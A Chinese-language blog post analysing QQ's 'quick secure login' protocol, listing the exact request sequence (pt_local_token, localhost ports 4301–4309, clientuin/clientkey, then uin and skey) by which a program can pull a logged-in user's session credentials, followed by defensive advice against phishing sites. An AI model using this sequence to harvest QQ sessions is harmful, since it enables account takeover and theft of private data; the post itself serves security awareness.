前言：

众所周知，很多网站会使用QQ授权登录，而不知道从什么时候开始QQ出了“快速安全登录”，那么快速安全登录真的安全吗？接下来我们分析一波。

一、快速登录请求：

请求地址：

https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=371&ptnoauth=1&s_url=https%3A%2F%2Fbuluo.qq.com%2F%23

请求头无需要任何带入操作，请求cookie。

从上图我们可以看到返回头出现一堆set-cookie，其他的没有什么用，但必须有一个关键cookie：“pt_local_token”，必须记录下来；

二、获取本地登录QQ：

请求地址：

https://localhost.ptlogin2.qq.com:端口号/pt_get_uins?callback=ptui_getuins_CB&r=0.6694805047494219&pt_local_tk=pt_local_token

其中的端口号为4301~4309，pt_local_token为前边取出的pt_local_token值，请求头带入Referer，Cookie带入pt_local_token=“pt_local_token”，然后我们就可以拿到本地登录的QQ：

var var_sso_uin_list=[{"account":"Q号","client_type":65793,"face_index":144,"gender":1,"nickname":"Blue","uin":"QQ号","uin_flag":4194822}];ptui_getuins_CB(var_sso_uin_list);

三、获取clientuin：

https://localhost.ptlogin2.qq.com:4301/pt_get_st?clientuin=QQ号&callback=ptui_getst_CB&r=0.7284667321181328&pt_local_tk=pt_local_token

请求头带入Referer，Cookie带入pt_local_token=“pt_local_token”；

四、获取uin和skey：

https://ssl.ptlogin2.qq.com/jump?clientuin=clientuin&keyindex=9&pt_aid=715021417&u1=https%3A%2F%2Fhuifu.qq.com%2Findex.html&pt_local_tk=1096080737&pt_3rd_aid=0&ptopt=1&style=40

请求头带入referer和cookie。

cookie需要带入pt_local_token、clientuin、clientkey等关键参数。然后得到uin和skey；

有了这两个参数就可以做一些敏感操作了，具体有什么操作，大家不得而知。

五、结论：

经过以上“QQ快速安全登录协议分析”，我们发现，其实并不是100%安全，程序很容易能拿到以上这些参数来获取你的QQ信息，例如QQ好友，QQ群，甚至你的空间相册密码。那么如何来避免呢，那就是用正版软件（防止开发者在程序里植入类似病毒），不要访问不安全网站，有些钓鱼网站进去就会出现QQ快速安全登录，那么你要是登录了，说不定就被人窃取了QQ信息。